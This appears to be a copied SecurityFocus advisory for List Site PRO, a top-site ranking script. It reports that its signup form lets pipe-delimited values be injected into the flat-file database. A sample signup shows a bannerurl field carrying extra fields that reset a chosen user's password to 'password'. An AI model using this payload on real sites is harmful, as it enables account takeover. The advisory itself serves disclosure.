17 lines
No EOL
667 B
Text
17 lines
No EOL
667 B
Text
source: http://www.securityfocus.com/bid/6685/info
|
|
|
|
List Site PRO is a top site ranking system that counts hits from member sites and then ranks them according to the number of hits.
|
|
|
|
A problem has been reported for List Site PRO that would allow an attacker to inject arbitrary values via html input form fields into the underlying flat-file database used by List Site PRO.
|
|
|
|
A malicious user could sign up like this:
|
|
|
|
username:username
|
|
email:email@emial.com
|
|
url:www.url.com
|
|
bannerurl:www.site.com/banner.gif ||password|%User_ID%|60|468
|
|
banner height:68
|
|
banner width:460
|
|
password:pass
|
|
|
|
To reset the sites,specified by %User_ID%,password to 'password'. |